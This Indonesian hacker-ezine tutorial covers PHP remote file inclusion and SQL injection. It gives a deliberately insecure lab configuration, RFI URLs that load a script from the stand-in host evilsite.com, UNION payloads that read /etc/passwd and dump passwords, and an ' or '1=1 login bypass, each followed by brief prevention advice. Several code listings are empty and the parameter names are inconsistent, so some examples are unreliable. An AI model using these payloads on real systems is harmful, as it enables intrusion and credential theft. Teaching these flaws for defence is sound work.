__ __ /\ \ ___ ___ ___ __ __ __ ___ _ __ /\_\ \_\ \ / __`\ /' __` __`\ /'__`\ /'_ `\ /'__`\ / __`\/\`'__\ \/\ \ /'_` \ /\ \L\ \/\ \/\ \/\ \/\ __//\ \L\ \/\ \L\.\_ __/\ \L\ \ \ \/ __\ \ \/\ \L\ \ \ \____/\ \_\ \_\ \_\ \____\ \____ \ \__/.\_\/\_\ \____/\ \_\/\_\\ \_\ \___,_\ \/___/ \/_/\/_/\/_/\/____/\/___L\ \/__/\/_/\/_/\/___/ \/_/\/_/ \/_/\/__,_ / /\____/ \_/__/ OMEGA|ZINE RELEASE 01 Author: unsuprise Life @ http://www.unsuprise.org Rumpun @ http://www.omega.or.id == Find Vuln In Php Programing.(Part 1) == Tulisan ini di peruntukan untuk segala umur yang ingin lebih tau tentang security di Php Programming. Sebenarnya sudah banyak yang menulis apa, bagaimana,dimana,cara mendapatkan security di Php Programming. Tetapi disini yang nulis ingin lebih menjelaskan agar lebih detail dengan penjelasannya berdasarkan contoh yang dapat di buat sendiri sama yang membaca ezine omega.or.id. A little about php. Php programing adalah salah satu bahasa pemrograman yang di pakai untuk pemrograman web dinamis. PhpBB,mediawiki adalah salah satu system yang di buat menggunakan php programing. PHP pertama kali dibuat oleh Rasmus Lerdorf pada tahun 1995. Sapai tulisan ini di buat php sudah menrilis php 5.2.12. Jika yang membaca ingin tau lebih banyak tentang php silahkan mengclick browser pembaca ke alamat http://www.php.net/ atau http://id.wikipedia.org/wiki/PHP Disini yang nulis ingin memberi tau apa langkah yang di ambil ketika sedang berkecimpung di dalam Php programing. Agar code yang di tulis tidak menimbulkan error yang dapat di exploit oleh hacker (white,black,or gray). Siapkan peralatan. 1.Komputer / Laptop Wammp (download http://www.wampserver.com/en/download.php) Disini yang nulis memakai server local menggunakan wampserver, Jika yang membaca punya hosting untuk praktek silahkan saja. Tekun(); Time exercise. Yang nulis disini menggunakan wampserver, jika yang membaca mau menggunakan wampserver harus ada yang di configurasi sedikit agar paket yang kita inject untuk praktek bisa berjalan untuk dilihat hasilnya. Configurasi: 1.safe_mode = off 2.disabled_functions = N/A 3.register_globals = on 4.allow_url_include = on ( untuk Local File Inclusion / Remote File Inclusion ) 5.allow_url_fopen = on ( untuk Local File Inclusion / Remote File Inclusion ) 6.magic_quotes_gpc = off 7.short_tag_open = on ( some scripts are using short tags,better on ) 8.file_uploads = on ( untuk upload file ) 9.display_errors = on (pesan error jika ada salah di deklarasi variable ) Please Wait..!!! 1.RFI (Remote File Inclusion) Code rfi.php ----------------------------- ----------------------------- Coba letakan di file xammp D:\wamp\www\rfi.php lalu coba akses menggunakan proses http://127.0.0.1/rfi.php?page=http://evilsite.com/evilscript.txt akan muncul error “Undefined index: page in C:\wamp\www\test.php on line 2” ok ini hanya basic. Selanjutnya. ==NULLBYTE (%00) Code rfi.php ----------------------------- ----------------------------- lalu jalankan http://127.0.0.1/rfi.php?pagr=http://evilsite.com/evilscript.txt Tidak akan bekerja karena script akan mencoba untuk memasukkan http://evilsite.com/evilscript.txt.php. Cara untuk menampilkan script injectionnya tambahkan NULLBYTE (%00) di URL. http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00 Binggo script injectionnya berhasil di eksekusi. NULLBYTE akan membuang semuanya setelah NULLBYTE di masukan. ==”?” code rfi.php ----------------------------------------------- ----------------------------------------------- logged=1 akan menjadi seperti variable.But lebih baik menggunakan nullbyte (%00) Ketika di jalankan: http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1 Binggo script injectionnya berhasil di eksekusi. ==FULL rfi.php ---------------------------------------------------- if (isset($_REQUEST["main_content"])){ $main_content = $_REQUEST["main_content"]; } else if (isset($_SESSION["main_content"])){ $main_content = $_SESSION["main_content"]; } ob_start(); require_once($main_content); ---------------------------------------------------- Ketika Di jalankan http://127.0.0.1/rfi.php?main_content=http://evilsite.com/evilscript.txt Binggo script injectionnya berhasil di eksekusi Ketika require_once($main_content); di hilangkan script injectionnya tidak dapat di eksekusi. Coba perhatikan kebanyakan dari code yang di tulis menggandung require,require_once, include,dan include_once. Lantas harus menggunakan apa? Semua itu memang harus di gunakan tapi terkadang para programer nya lupa akan hal yang harus di waspadai ini dia: require - require() "identik dengan include () kecuali atas kegagalan itu akan menghasilkan tingkat E_ERROR fatal error." require_once "identik dengan require () kecuali PHP akan memeriksa apakah file sudah dimasukkan, dan jika demikian tidak termasuk (require) lagi." include - mengevaluasi file yang ditentukan. include_once - mengevaluasi file yang ditentukan selama eksekusi script. Penjegahannya: 1. Memvalidasi variable dengan benar. 2. Mengkonfigurasi kembali settingan php pada server website Anda. allow_url_include = off allow_url_fopen = off magic_quotes_gpc = on 3. pada include mungkin bisa ditambahkan "./" jadinya seperti ini, include("./"$_GET[page].".php"; 2.SQL injection Disini yang nulis pertama kali membuat database beserta dalem dalemnya. CREATE DATABASE `test` ; (membuat database dengan nama test) CREATE TABLE `test`.`members` ( `id` INT( 15 ) NOT NULL AUTO_INCREMENT PRIMARY KEY , `username` VARCHAR( 255 ) NOT NULL , `password` VARCHAR( 255 ) NOT NULL ) ENGINE = MYISAM ; (membuat table members didalam datebase test) sql.php ----------------------------------------------------------------- ----------------------------------------------------------------- Variable id tidak di filter karena itu hacker bisa saja menyisipkan code SQL Injection ke dalam variable id contoh: http://127.0.0.1/sql.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4-- Binggo hacker dapat melihat database members yang di buat di awal listing_view.php ------------------------------------------------------------------ $id = $_GET['itemnr']; require_once($home."mysqlinfo.php"); $query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Aqua where id=$id"; $result = mysql_query($query); if(mysql_num_rows($result)){ $r = mysql_fetch_array($result); ------------------------------------------------------------------ * untuk Yang ini databasenya bikin sendiri yah :D Coba kita lihat variable id ditetapkan untuk ['itemnt'] tidak di filter dengan cara apapun. http://127.0.0.1/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users-- Binggo hacker dapat melihat database Aqua. Pencegahan Cara sederhana: Jangan biarkan karakter khusus dalam variabel numerik variables. menggunakan (int), misalnya $ id = (int) $ _GET [ 'id']; Cara lain: Untuk non-numerik variabel: menyaring semua karakter khusus yang digunakan dalam SQLI: -,. () ' "_ + / * 3.SQL Injection Login Bypass - Code snippet from /admin/login.php ----------------------------------------------------------------------- $postbruger = $_POST['username']; $postpass = md5($_POST['password']); $resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'") or die("
" . mysql_error() . "
\n"); ----------------------------------------------------------------------- Di dalam code tersebut tidak ada penyaringan seperti pemasukan character aneh (SQL injection).Dengan memanfaat kan SQLinjection Login Bypass seperti contoh di bawah username : admin ' or ' 1=1 password : sirgod Binggo Kita dapat melihat hasilnya. Kita masuk tanpa tau username dan password yang benar. Pencegahan Cara sederhana: Jangan biarkan karakter khusus dalam variabel numerik variables. menggunakan (int), misalnya $ id = (int) $ _GET [ 'id']; Cara lain: Untuk non-numerik variabel: menyaring semua karakter khusus yang digunakan dalam SQLI: -,. () ' "_ + / * Cara yang nulis : Selain menggunakan cara di atas. Biasa yang nulis itu menggunakan fasilitas chapcha jadi di buat validasi dari inputan username,passowrd,dan captcha nya. dan juga validasi charater dan inputan kosong etc. end. Celah yang lainnya dalam tahap pengetikan. Jadi Bersabar lah...!!! Referensi - google - astalavista - adrenalin yang banyak dan kerja keras. Spesial Thanks : omega.or.id and all security IT indonesia.